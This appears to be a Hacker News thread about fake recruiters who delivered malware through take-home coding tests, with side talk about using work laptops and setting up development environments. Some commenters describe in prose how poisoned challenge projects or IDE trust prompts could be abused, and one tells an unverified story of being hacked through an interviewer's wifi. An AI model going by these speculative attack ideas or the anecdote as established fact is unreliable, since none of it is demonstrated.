Wait, they got in through take-home leetcode tests?
That’s damn clever.
I program Apple software, and Xcode projects can dig deep. Apple gives you a warning about opening a downloaded project, but you’re almost certain to ignore that, if you think it’s a take-home.
I assume that taking online ones would ask for hairy access, as well.
Also, the people going for these would probably have pretty damn good access to the corporate Crown Jewels.
Of course, no one would use corporate resources for job-hunting, right? I know that folks here, get all huffy, when I suggest that happens rather frequently.
>Of course, no one would use corporate resources for job-hunting, right? I know that folks here, get all huffy, when I suggest that happens rather frequently.
Where I work we have a take home exercise we have candidates do and then when we have the interview with that person we review their code with them and ask them to make incremental changes to see how they handle the asks with their communication skills and their technical ability. I interviewed one individual who couldn’t even get the REPL started for their project and as they were struggling trying to get it to work I heard them mumble to themself “I should have just use my work computer”. The fact they couldn’t get the most basic aspect of the project to work on their personal meant that they did their coding assignment on their work computer
Interesting. What makes work provided computers better suited for coding?
Me, I don't recall using company hardware for anything even remotely personal in many years. It's stupid because they are loaded with all kinds of spyware.
When you spend eight hours coding on your work computer, you make lots of little tweaks to improve workflow. If you then do nearly no coding on your home computer, it's unlikely that you will perform the same tweaks. I try to keep my systems set up almost identically, but that's a lot of work. (I now try to use ansible for that but after playing around for a bit I'm having doubts if it was the right choice. Keeping everything in sync is not exactly ergonomic.)
Some particular quirk of autocompletion could become almost pure muscle memory, and if it's suddenly missing, you notice.
Work computer is windows with wsl, home computer is Ubuntu. Work computer I need to develop in IntelliJ and vscode. At home I can use copilot or local LLMs, at work I cannot (nor several other useful extensions) At work I use maven and I have to spend 15minutes dinking with project settings anytime I need to compile a new project. At home I have admin privs, at work it’s a set of hoops to get temporary admin access so I forgo things like system environment variables.
I am skeptical that nix or home manager would solve these problems. So I just have a specific setup at work, that is typically more advanced and automated than my home system. My leet code interviews suffer because of this. Just makes me realize that coding interviews using an environment that does not mimic the workplace is just excluding senior developers (read: old people) who don’t have the time or patience to jump through these hoops for 15minutes of placating a recently hired college grad
Nix evangelists should seriously consider putting the breaks on advertising Nix until its horrible UX is fixed. I’m struggling to even discuss Nix as an option at work because every engineer I bring it up to has had bad first impressions.
when you get a work computer you have to get it set up to do your work immediately. The work you are doing is probably the work you will be interviewing for thus you have everything you need to set up for the coding challenge already set up on your work computer.
When you get a personal computer you do not need to set up all the things you need to do your work immediately, so you will do the setup of things as you need them.
thus if you get a new personal computer it might not be fully setup yet.
If you are of the age that you have kids you may not have time to do any sorts of personal projects, if so and you have an old personal computer it may not be up to date with what is needed for the coding project because you have not been doing a lot of stuff.
If you have kids or other problems your personal computer may end up broken or unusable and you might not have the money at the moment or the reason to buy a new one.
I mean the first one is probably not right either, since often you need to do some particular thing or use some library you are unfamiliar with but it is at least more right than on your personal computer for the other reasons listed.
> Interesting. What makes work provided computers better suited for coding?
They already have working software development environments. It's a process that can be time-consuming and is done once in a blue moon (basically when you need to reimage the machine). In the meantime, all changes to your software dev environment are gradual, and your work-provided computer ends up being configured like a software development pet instead of cattle.
Moreso if your company adopted/enforces internal development tools.
Ask yourself this: how many times have you went through a complete OS reinstall and subsequently had to setup a working software dev environment? Is this something you have automated? Most people do not.
I've been in almost exactly this situation, although the issue was rather that I have a Linux tower without camera/microphone and a Windows laptop for playing some games or doing Microsoft / office stuff. Setting it up to anything resembling my real dev experience is probably a day or two of work, and the first time I used it for a job interview I probably seemed less than competent...
I also have a work MacBook, but so far haven't used it for applying to other jobs, that would be kinda weird.
I have met people who can’t really code outside an IDE. If someone has a full JetBrains setup at work, and never worked any other way, it might be really hard for them to change code on demand without it.
I expect there is a similar, but worse, problem growing with CoPilot and friends.
Just that it's set up in a particular way, I suspect. A long running project/organization will accrete plenty of tools, scripts, configurations, etc that make their environment different than another using a similar stack.
For a few roles I’ve been allowed to buy a top of the range MacBook and expense it without any contact with IT - no spyware, no anything. To that end, I never felt the need to buy a personal laptop and do basically everything on my work laptop
If your company ever has to go through litigation, all of your personal data will be at risk during discovery. Always keep work and personal separate. This includes mobile phone
I don’t even use the same OS at work. I use macOS at home, but work at a Windows shop on a Dell.
I guess this is because in college and my first few dev jobs used Macs. A nice side effect is my wife hasn’t had any tech support complaints since we switched, it has been great.
I’d still never use company hardware for personal stuff. I don’t even login to Spotify on the company laptop.
She doesn’t seem to have issues with macOS at all though, aside from the one time I had her using a VPN and it expired which is totally on me and disabling it was nonobvious.
> Interesting. What makes work provided computers better suited for coding?
Some people only know how to code within the environment managed by their corporation. This is increasingly the case with folks that have only worked at Kubernetes shops.
> I interviewed one individual who couldn’t even get the REPL started for their project and as they were struggling trying to get it to work I heard them mumble to themself “I should have just use my work computer”. The fact they couldn’t get the most basic aspect of the project to work on their personal meant that they did their coding assignment on their work computer
I've been a candidate who "couldn't even get the most basic aspect of the project to work".
I had been working for years at a company that most developers in the world would sacrifice their firstborn to have a shot at being hired, and I've been using their work laptop for years on end. I considered switching gigs, I answered a recruiter's call, and I found myself in a technical interview using one of my own laptops. Only during the interview did it dawned upon me that my personal laptop had no development tools installed. Why? Because I never used it for work. Worse, I was used to my employer's automated process to setup software development environments, so I had no assurance that I could setup a fully working dev environments in 5 or 10 minutes, let alone the meeting's full hour. If you want to run Python as a REPL on Windows, good luck.
Thankfully my meeting ended up using a webapp to do the pair programming/coding challenge, but if I had to run code on my personal computer I would have to spend far more time setting it up than testing stuff, reschedule the meeting, or simply bail out.
Some companies allocate more than a day to get new candidates to set up a working dev environment and building a project, while assigning an experienced dev to guide them. I know that because I've onboarded half a dozen people and that's what it usually takes.
I'm reading your comment and I'm surprised you didn't noticed how your account does more to document how oblivious you and your team were to critical failures in your hiring process than in assessing the competence of a candidate. How many times per day do you need to setup a software dev environment? Is this how your company gets paid? Is that where you needed additional people to work on? No? Then why on earth are you evaluating them in a completely irrelevant domain? Don't you have people in your team who can spare some minutes documenting and automating that process?
By the way, following that interciew I was extended an offer for a senior position. If the recruiter was like you and I would have been evaluated on my ability to setup a working software dev environment in the allotted time, I'm sure I would have spent over half the meeting googling for where to download the interpreter and how to set it up.
I can select "run Python as a REPL on Windows" in your post, right click, search and find an answer within a minute.
From my experience, onboarding at companies is a painful process due to internal software, specific setups for complex build processes and (frequently) permissions / annoying processes required for downloading and installing things. Those points are not applicable if you are using publicly available and well documented tools on your own machine.
> I can select "run Python as a REPL on Windows" in your post, right click, search and find an answer within a minute.
That takes place only after you search for the python installer, download it, install it, check the environment flags, and restart your terminal of choice.
The web is jam-packed with examples of how problematic it is to setup and deploy Python on Windows, and we're not even touching the problem of how some fundamental packages, such as anything involving the file system, is either riddled with platform-specific gotchas or does not work at all.
Setting up a REPL is a far more involved process than it's being casually described in this thread.
It can be that simple, but there are plenty of times where the easy route doesn’t work. Sure it’s solvable with 5 minutes of googling and applying the top stack overflow solution, but of course the interview is not the time for that. And there are many other aspects that can throw you off and give the unjust appearance of incompetence.
My anecdote was to show that there are in fact people who use their work computer in order to do projects related to their job search. You have made many assumptions based on my small paragraph.
First, this is a coding challenge that the candidate is given before the technical interview that is well defined in the expectations and is small in scope. They are not expected to spend more than an hour or two on it and they send the recruiter (who is an internal recruiter) a link to their github repo with their completed project before the technical interview is even scheduled. Candidates would have several days and potentially even a week between when they finished the project and when we have the technical interview. The candidates are also told that their project will be gone over in the technical part of the interview. I understand that there are circumstances that would prevent the individual from getting an environment set up on a personal computer but if that is case then just stick with using the work computer.
Second, I never even indicated if the individual was hired or not but you made the assumption that we passed on the candidate. The fact that the candidate couldn't get the repl started was just a tidbit that stuck out to me and I made the comment to my coworker as it is odd to me that a candidate would use their work computer for a job search. We just went with the fact we couldn't use a repl and had the candidate just talk out loud with what he would change when we added different scenarios/requirements.
For what it's worth, the candidate was using a Mac for their personal laptop and so all they would have had to do is run the following in their terminal and it would have gotten them pretty close to being able to run the repl
At my first IT job, I spotted some bounce messages from a jobs address at a local big pharma firm. Admittedly, personal email addresses weren’t as common in 1996 as they are now, but still, rookie mistake.
I’ve maintained a strict “don’t do anything personal on a corporate computer” policy for a long time, but I’ve not found that to be a common approach.
Same here. Air gap your personal and professional life. Separate devices, separate networks (if you work from home), don’t even bring your personal device to work if you don’t really have to.
There was a story a few years back making the rounds on HN where an Apple employee had to turn in her corporate device due to some lawsuit against the company. This happens all the time in big companies. She was outraged at this because she had personal nudes on her corporate device. WTF how could anyone think this was a good idea?
I don't work for Apple or (honestly) know anyone that does, but from at least one news article, I get the impression Apple openly encourages (and maybe even requires) it.
> I get the impression Apple openly encourages (and maybe even requires) it.
When I worked at Apple I needed a personal iCloud account to set up my corp MacBook. I simply created a new dummy personal account just for that. Nobody's auditing your iCloud account to make sure it's your "real" personal account or anything.
At my last job I used a dummy iCloud account at the system level, but you can log into a separate account for the app store, which was necessary to avoid having to re-buy some apps I depend on.
Just as I was leaving they were in the process of replacing everyone's computer with new ones that were much more locked down.
Yeah about that. That's one of the biggest weirdness in related to Macbooks on a corp environment, why do I need an unrelated account to do basic stuff on an Apple machine
It all depends on how they manage them. You can and should just make a youremail@company.com icloud account. I'm actually surprised that's not the norm so they can take over stuff like activation lock.
I don't use a personal icloud account on my work computer... it's not even allowed lol.
Meta also requires in their TOS that you have only one account and that it uses your “real” identity, so you’d be in violation of TOS with your work account.
> There was a story a few years back making the rounds on HN where an Apple employee had to turn in her corporate device due to some lawsuit against the company.
Smarter decision is for the corp to just buy your device for you. Then it's a personal device, and at least in some cases I'm aware of, not a government record at least.
Very doable for a phone where your "work" is limited to messages, webmail and calls.
My advice to young colleagues: never do anything on a work computer that you wouldn’t mind your boss (or her boss) seeing.
Being greeted with a Department of Defense splash screen before login reminding me that everything I did on that computer was subject to monitoring formed that habit early, and I still can’t shake it, no matter how long I work in Germany, for a German firm with a rather assertive works council.
> no one would use corporate resources for job-hunting
Morally grey(pale blue?) aside, I've been given entire days at work to look for new jobs as part of a redundancy agreement, it was widely supported by management.
Apple added sandboxed shell scripts recently, I assume as part of an effort to make builds a little more hermetic. While I’m sure it’s not a perfect solution I feel like it would be nice to open a project in a mode where all build steps run in a sandbox. Obviously when something fails you can take a look at what it was trying to do :)
Whenever I grade take-home assignments, the first thing I do is open the Xcode project file in vim and look for shady stuff. Admittedly, I don’t think most of my colleagues do the same due diligence.
Personally I gave up having my own computer about 10 years ago. Probably not the “safest” strategy, but I always found it a bit wasteful to buy a second device.
In many companies using work laptops for private stuff is considered a security issue and a breach of work contract, not everyone actively checks it, it is however an easy way to fire someone when something like this happens.
We had someone submit their current employers code as a solution to the assignment. It had the company’s name all over in namspaces, etc. It was also not what we asked for, but something only slightly related. Their employer was making medical devices.
The attackers didn't even use a trojan project/source. They just sent a malicious .exe (wrapped in an .iso file) and asked the victim to run it and write a C++ program that produces the same output.
Everything cooperate devices touch the own, so if you hunt for a job on company property you become a consultant in your next job leased out by your current one. u/s@
I’m always surprised people do take home tests, email headhunters, call and interview with other companies on their current company’s hardware. Plenty told me they do it, but I just can’t comprehend it.
There are so many potential consequences. An eager beaver manager once talked a future employer out of employing me through a personal connection, and that was just because they found out. Even if it was unethical or illegal, these things happen, and even in large tech companies. Imagine willingly sharing all details of your job hunts with your employer… maybe it’s just me, but the thought feels wrong.
Work and personal matters should be church and state, right?
I find it pretty disturbing how many of my coworkers don't even have a personal computer -- they just use their work laptop for everything. Mind-boggling. (These are software developers, they can damn well afford a laptop.)
The most I mix it is using my smaller, lighter, Bluetooth-supporting work laptop for watching innocuous YouTube videos while doing dishes. And I used to use it to print stuff at the office, on occasion.
Yeah I’m always surprised by the why anyone would risk having their personal email/life dragged into a corporate dispute because they are emailing stuff between their work and personal accounts etc.
There are 2 types of people. No, not actually, there is a continuum of the feeling of 'just getting by'/low motivation. Many people exist on the side of low motivation and those on the other side don't understand them.
> These are software developers, they can damn well afford a laptop.
Not necessarily. On the one level, you don't know their salaries (as they might have negotiated badly or simply be underpaid), and then additionally they might pay a lot for housing, child support, debt, medicine, or other invisible expenses. Living in a place like San Francisco it can quickly add up.
It's not surprising to me at all, there's very little to friction to continue to use the thing you use every day for a new task.
I completely agree with you, it has a high risk associated with it, and you really shouldn't do it, but i can see how it happens when people don't think things through or don't remain vigilant.
So they sent .exe files to the victim, under the pretext that the victim was supposed to duplicate their functionality in C++? Receiving an .exe file from someone should be a dead giveaway that this is an attack, or at least, that the person sending it to you is incredibly technically incompetent. But then again, I lived through the Windows 95 era. I suppose some lessons have to be re-learned with every new generation.
You only need to succeed once against a company full of people if your job offer is enticing enough. We don't know how many people said "never mind" when asked to do weird tests.
The stupid thing is that that it's remarkably easy to sandbox and application these days. Sandboxie is free, though not guaranteed to work (but it may very well have done, or at least would have made the strange behaviour obvious) and Windows Pro has had a right-click menu option to run an executable in a sandbox for a while.
When I read the title, I initially thought it was about infection through IDE ("do you trust the authors of this project" is there for a very good reason and in the case of VS Code attackers can get code execution before the prompt through Git config trickery).
I'd be wary of executing a program, but I bet I would click the "sure enable code execution" button if a recruiter sent me a coding challenge in the form of an incomplete project with a Git repo. Especially if they could set up a remote interview process where they want to go through code live "to see how I approach problems".
Right nowt he attack is super basic, but it's not hard to make the initial infection harder to detect in time.
At first I thought this was more clever than it was. Taking people into running downloaded or attached exe files is simple and apparently still effective.
But what would be even more wicked, and effective would be pointing them to a GitHub repo with the “challenge” project to complete, and referencing a compromised package that does their bidding as the victim tests their solution.
Yeah I was thinking about that. Even asking me to use a specific package for any reason, I probably wouldn't think much of that before today. However now I'd certainly question it.
Knowing what they were trying to do actually makes me wish I were the one they were trying to trick. I know these aren't regular lame script kiddies, but I wonder how they'd react to an attempted counter-offensive.
Give me an .exe and ask me to run it, and I'll open it in a hex editor for inspection instead. If what you claim is a "hello world" or Fibonacci generator is much bigger than I'd expect (a few KBs) and contains encrypted-looking data or other attempts at obfuscation, I'm not running it.
I’ve suggested binary distribution as part of a black box exercise in the past. Locking down the source and being able to change details for each candidate would mean solutions posted online would not help.
Any particular reason you’re being so combative about this?
I’m talking about a take home code challenge. It’s unreasonable to have someone to record a video that could last an hour or more. And I’m not gonna sit and watch that.
When I was consulting on some government programs, I consciously kept my resume off the Internet.
I didn't have access to anything useful to spies, but some of the keywords might look to someone like I did. Like how some recruiters seem to spam all keyword search hits on LinkedIn.
I knew I'd have to report any kind of security incident, and I thought that might interrupt my contracts and income, while a cautious bureaucracy processes the incident. So, no resume online. Also, measures to try to prevent a random burglar from inadvertently stealing the work laptop.
(Now that I'm away from that work, I get to enjoy LinkedIn recruiter spams for Junior Python Leetcode Hazing Engineer roles, like everyone else.)
Don’t know why you’re getting downvoted. I’d imagine that not publicising your employment status is a run of the mill security measure for specific roles and industries that are subjects of targeted attacks.
As a meatspace equivalent I’m sure there are not many CIA operatives walking around foreign countries and giving out CIA-stamped business cards.
Off-topic: Given that state cyber entities maintain networks isolated from the internet, how do they adapt to the rise of tools like Co-Pilot and ChatGPT in the software engineering landscape? This kind of security setup inherently restricts access to such tools, potentially slowing their pace. Thoughts?
Don't use them, duh. Pay enough money to get a copy on premises if it ever gets useful enough for that. In the time they'll get around to changing their procedures, models will get small enough that it will be a non-issue.
Disclaimer: layman's opinion, I only know what internet knows.
I work at a large SF based SaaS, there's so much money in that space the company spun up a team to build an air gapped version of our product for restricted networks.
It's definitely much slower than the private sector, but if the agencies decide they have a use case, they'll throw money at it until it works in house.
I think that's an over-reaction. I am in a similar situation (I don't want certain people to know where I work), but I am OK with keeping the old CV, which doesn't mention the place where I work now, still online.
I have also asked the head of HR to make absolutely sure that my name is not on their public "our team" page. As a side effect, I always giggle during the mandatory corporate security training that tells how to deal with targeted attacks and demonstrates example phishing emails - so far, I received zero, if we don't count tests by a pentest agency.
Yeah, today, if I needed to keep a lower profile about a role, I'd still want to be on LinkedIn (if only to be reachable by contacts, now that the Web is so centralized), so I'd do something like that.
What kind of imbecile does personal stuff in a company device? We are not talking about poor people, we are talking about people who have money enough to have their own personal devices.
I use my company laptop for personal things all the time. My personal computer is some kind of space heater that can also run video games, so I don’t use it by default. I can afford a third device but I have better things to do with the money.
Of course I aim to respect the security rules of my company. I trust my company. I wouldn’t enjoy working for a company that I wouldn’t trust with my browser cookies.
The laws are also on my side in my jurisdiction. I cannot be fired simply because I did something my company didn’t enjoy on the company laptop. They need a really good reason.
I see. It sounds very unlikely and I’m fine with the personal data I have of my company computer being exposed within the context of an investigation and a trial. I guess it may be more scary in some countries.
> It sounds very unlikely and I’m fine with the personal data I have of my company computer being exposed within the context of an investigation and a trial.
Okay, lets talk about something more likely: your communications are not private - when you connect to an https URL you expect that your password is never in the clear.
With most organisations I have worked with/for, they almost always perform MitM on all TLS connections, and it works seamlessly (i.e. without you knowing) because their certificate is on the machine.
Only the very small and/or very poorly-run organisations aren't doing this, because unless they do the MitM, the network tools they use to detect malicious activity on their network cannot do Deep Packet Inspection (tools such as Darktrace).
It's exceedingly unlikely that the password you used to log into your bank account from your work computer is indecipherable to your network operators. It may as well be in the clear within the network.
> ...most company policies will try to block USB drives of any kind.
Grand assertion. Where's your supporting cite? To be clear before goalposts are moved, the context is external optical media drives---a peripheral commonly issued along side laptops without one---not USB mass storage devices.
> a peripheral commonly issued along side laptops without one
Wait, _is_ it? In this future year of 2023? I haven’t seen this as common practice for at least a decade.
(The sort of higher-security-stance companies who disable USB drive support will also generally disable support for external optical drives, because why take the risk?)
Someone who needs to. In this case, the victim worked for an aerospace company. I know some people in that industry and all of them work insanely long hours. On top of that, it was a Spanish company, so working for 10+ hours a day would be expected.
If their boss wants to meet with them at 8PM, skipping their siesta won't help. Spanish corporate types hang out at the office until their dinner time, which is also horribly late.
Google, Apple, and Microsoft all presumably encourage their employees actually use their software before it goes out to the public to make sure it actually works. Google doesn't want to find out that some changes to Android cause major apps to crash so they encourage their employees to use work devices as their personal devices in order to get better coverage.
Not exactly the same thing, but the highest paid position I have ever had so far in my career was one that expected me to use my personal device for company work. There are many well known employers that take IT security seriously, and many that don't.
Slight tangent: How can Lazarus/HIDDEN COBRA be such a sophisticated nation state actor when North Koreans can barely access the internet until becoming government employees?
One would think that being unable to access modern security research, open source projects, programming resources, or "wild" malware would not exactly raise a nation of brilliant hackers. Perhaps some who subvert the great firewall are vanned and offered a job in the unit?
>being unable to access modern security research, open source projects, programming resources, or "wild" malware
how do you know they are unable to obtain such things?
also, how do you think hackers are trained? by teaching them how to create a ToDo app with the nightly build of React?
they probably know by heart the ethernet and TCP/IP stack better than the guys who created them and could recite it backwards, and that's already enough to hack plenty of things
I think (based on my limited research) it's either a loose affiliation (mainly based in China or Russia), or the children of party elites who likely have more privileges and access than thr average North Korean.
The story I may have heard from a talk by a Dutch cyber security organisation is that they train their hackers inside the country and then ship them off (under heavy oversight, of course) to China, where they'll operate from internet cafes.
They recruit the best from school early on and their training is intense. It's a very desirable job in a country that has food, electricity and other shortages.
Have a listen to the Lazarus Heist podcast for more information.
Unsurprising, of the 300 staffing agencies in our area only 23 are actually licensed to legally operate as a service. Trying to authenticate which are "fake" or "real" is a thread most companies/applicants rather not pull.
There is also the fake-hire scam: where staff are lured away with lucrative compensation packages, data-mined by the competitor, and finally jettisoned before the evaluation period expires (typically 6 to 10 months).
A few infected PDFs from various bad actors are also floating around out there with exaggerated promises.
Keep safe, and note 86box supports read-only backing images and sessions Like Bochs/kvm:
Ha! There's this kind of bad stuff that happens. Back in 2019 my laptop got hacked over the "free wifi" provided in the HQ, had to change all my SSH keys.
Look it is probably nothing…but anyway, this is not the time nor place to name and shame, but more specifics.
So… Interviewer specifically asked me to bring my computer, after the initial intro they asked me to show some code I’d written. I said I’d just connect to my mobile hotspot. They looked shocked and said “I didn’t think you’d have a phone here” (it was an overseas fly out for the day), I said it’s fine, I always have a phone. And they insisted I instead connect to their office wifi.
It was the only wifi i used the whole time i was there.
Back in other country I saw my mail had another logged in session, and a private repo post install script had pulled a resource from my server, from an IP back in the country, and another random country.
Only way to access to private repo was SSH key (or GitHub credentials) Only way to access to Mail was MITM cloning session or access to device (more likely - I thought i would have noticed any MITM cert issues).
Incidentally, from the same country, this time another company, I had another fly out interview request a week later and this company also specifically asked me to bring my computer — when I asked if it would be ok if I wasn’t gonna bring my computer because I needed to get it fixed, they got back the next day and said oh, we have to cancel the interview because we it won’t be possible for us to proceed.
To proceed… with hacking?
Hahaha, who knows? I’m not expert enough to know what this all means. Maybe it’s nothing. It’s probably nothing.
This sounds to me like you connected to a network on your laptop and cloned an "internal" repo that downloaded something (no different to. Pip or Npm do the same thing.
And that your mail client saw a new IP and treated it as a new session? I think assuming you were hacked based on this is paranoid.
> To proceed… with hacking?
Or maybe, they didn't have a laptop for you to use (which is stupid, don't get me wrong) so they couldn't do the next stage unless you had a device. Given you had to use it for the first step, it doesn't seem unlikely.
If they wanted to "hack" you, they didn't need to fly you out, they just needed you to clone the repo and run the script.
Haha, yeah, I understand how you could have misread it like that, I'm sorry the original was not very clear!
Let me try again: then didn't ask me to clone any repos of theirs. They only asked me to show them my private repo on GitHub so they could see some significant work I had done. I just picked some random nothing file and they were satisfied. Then I saw that this private repo had been cloned after that trip. Normally you can't see clone IPs on GitHub but for my install process the npm "postinstall" script pulled something off my web server. Basically I had a line buried in one of the scripts referenced in the postinstall script:
The only thing that ever pulled off that URL was that private repo postinstall script. After seeing my mail session at a random IP in that country, I thought oh that's probably me, but then I was already back home and I wondered why there was still a session there, so I then checked the logs of my server saw another IP from that country pulling that URL, from the day after I was there, when I hadn't made any servers there or run that script when there.
What you say about the laptop was what I originally thought: Why do they want me to bring a laptop? Do they seriously believe I don't have a computer? Hahaha
> If they wanted to "hack" you, they didn't need to fly you out, they just needed you to clone the repo and run the script.
I agree it sounds implausible, right? It's probs nothing. Likely I'm just misreading it.
I don't want to jump the gun and I think it's prudent to keep an open mind, I certainly don't want to spread a bs rumour, nor misrepresent a country with something had not been definitively proven with facts. That would totally lack integrity, be irresponsible, and would be undermining due process and ethics. It would also just be disgusting awful betrayal of everything good, so I don't want to jump the gun or name and shame.
I was invited and travelled to many countries for these types of interviews back in the day, all over the world: Europe, USA, Asia, even one in Africa. Definitely had some weird vibes at different places, but never had the same feeling of "hacked" as above.
But just wanted to clarify the facts. Does what I said make sense? Sorry it's late here.
Yep, two different companies flying you out just to hack your shit. It's probably nothing. It makes me curious what you work with. Do you maintain commonly used open source software?
Well I mean, it's not like anyone told me they were hacking stuff. I'm probably just over reacting, or misreading it. Strictly speaking I think it's prudent to keep an open mind until it's definitively proven with evidence, but my current take is what I've said here.
This was at the point in time where I was developing BrowserBox and doing demos but had not released the code publicly.
I don't want to be responsible for misrepresenting a country, and I think it's prudent to keep the protection of privacy there until it's definitively proven with evidence.
I take it a bit further. I won't go into pissing matches. If folks wanna fight, I'm not the guy to do it.
My general stance is, if it's complimentary/good, I don't worry too much about getting specific. If not, I keep it vague (which sometimes pisses people off, but life is not fair).
I generally don't name my former employers, just to keep their name out of venues where someone else with a grudge could throw poo (see "Apple" -not a former employer of mine).
Me too man. I don’t like saying negative stuff about people, especially unprovoked (is not a counter). Feels like a grave responsibility. Always been that way! I love complimenting people.
I’m not sure if it’s connected but in the general sphere of things, maybe one downside I’ve noticed in my life is i can be a bit slow to notice when someone or something isn’t good for me. Even if it’s obvious, to others, i always wanna see the good, sometimes i think I’m in denial willingly! Haha… So I have learned to become aware of such people and their behavior, pattern recognition.
I've learned to keep some relationships at arm's length.
It's a long story, but I have spent my entire adult life, dealing with some of the most dangerous, doesn't-play-well-with-others people on earth. I'm proud to call some of them friends, and have learned to politely avoid getting too entangled with the drama of others.
I've learned that I'm responsible for enforcing my own boundaries, and that I don't need to use nukes. Often a simple "No, I'm not going to do that, but I will do this..." is sufficient.
What exactly did you do over the wifi? How do you think they were able to access your private SSH key by simply having your laptop join their wifi? Did you leave the laptop unattended and unlocked?
That's what I'm trying to figure. Open wifi or not, your private ssh key shouldn't leave your pc when you're using it. Ditto for whatever sites you visit over HTTPS, the whole point of TLS is to avoid MITMing connections and extracting their contents.
I'd assumed that somehow connecting to or using their wifi got local privileges?
There's things like cellular modem exploits that bypass all the higher layers of the stack and get access to your cell phone at the base layer. I'm guessing similar stuff exists for wifi. Heck it could have even been a power cable I maybe mistakenly plugged in trusting it! I'm not an expert on any of this tho.
With the MITM I think you're right, I would have expected to see some cert issues. But I know I have seen GitHub MITM'ing before with a state issued MITM certificate (won't say where right now), tho I did notice that because there were connection issues and then I paid attention to the address bar.
It could have been that there were cert issues, I just wasn't paying attention to them, as it was an interview. That sounds plausible.
I guess the issue is there's all kinds of exploits and zero days that most regular people don't really know. Of course they could have combined it with a PDF exploit from something they emailed me. I don't know!
Did you find anything on this in the meantime, on theories on the different ways it could be possible? How would you rate your cybersecurity redteam/blueteam knowledge in this domain on a scale of 1 to 10 (10 being best)?
Some kind of unknown wifi attack seems the most plausible to extract the ssh key if you cofirm you haven't left the laptop unattended and everything else is reasonably secured.
Although you're certificate point did give me pause. Don't you have the private ssh key stored somewhere accessible from github? Like some kind of action or whatnot.
Also, is that key not password-protected? Did you ignore some SSH connection warnings and forwarded your agent?
I don't work in cybersecurity, so let's just say that my readteam knowledge is 1. I just try to understand how things work and protect my stuff as best I can. I'm just very surprised since your situation seems, on the surface at least, to fly in the face of what is commonly expected.
Thanks for the encouragement! But oh I’m not sure what you mean with Amazon. I didn’t say that was the company and for the record Amazon wasn’t involved as far as I know.
Also i didn’t think the original article was referring to Amazon but i could be wrong about that, sorry.
> Two malicious executables... The first one is a Hello World project... The second prints a Fibonacci sequence up to the largest element smaller than the number entered as input.
That should have been the first tip off something was wrong, Meta would start with a LeetCode medium or hard.
The security on this website is fantastic. They have disabled the use of the arrow keys to scroll the content of their pages. This must obviously be due to a previously unknown attack vector via the use of the keyboard. Bravo!
>One of these RATs is already known to be part of the Lazarus toolkit, specifically a variant of the BlindingCan backdoor with limited functionality but identical command processing logic.
The attackers were using already known Lazarus malware. The researchers aren't simply basing the Lazarus attribution solely on an insider trading strategy or time zones.
Threat intel and analysis is just like any other analysis, it is taking a heuristic approach to finding answers.
Can it be bypassed? Yes.
Are the researchers whose entire company hinges on the correctness of their analysis doing their absolute best to attribute the attack to a threat actor? Yes.
So to your point, somebody could indeed reuse malware or attempt to replicate it. However, the researchers are likely analyzing the disassembly and bytecode, and replicating complex malware to perfectly imitate a known family of malware is exceptionally difficult and statistically very unlikely. This is how threat intel is able to make any sort of claim of attribution.
This kind of comment exists on every security thread and it's amusing. Even if they know for sure the identity of the hackers, they wouldn't risk revealing their tools and methods just to satisfy the general audience. Do you think they care if the HN crowd is happy with their finding?
Seems like next time you should ask for an access to a cloud server. But wait... if they are fake recruiting cybersecurity experts you could end hacking someone else site.
LinkedIn was a great platform, weaponized by Microsoft as the biggest security risk. There is no innovation for security, making it feature rich and more user friendly.
Ultimately, what made this attack possible and effective is the low morals of the people who applied to other jobs behind their employer's back, on their employer's computers
Employees don't belong to their employer. There is nothing wrong with trying to acquire a potentially better job. The only real problem is they were using company resources to do so. Also, they were completely incompetent by running random executables.
That’s damn clever.
I program Apple software, and Xcode projects can dig deep. Apple gives you a warning about opening a downloaded project, but you’re almost certain to ignore that, if you think it’s a take-home.
I assume that taking online ones would ask for hairy access, as well.
Also, the people going for these would probably have pretty damn good access to the corporate Crown Jewels.
Of course, no one would use corporate resources for job-hunting, right? I know that folks here, get all huffy, when I suggest that happens rather frequently.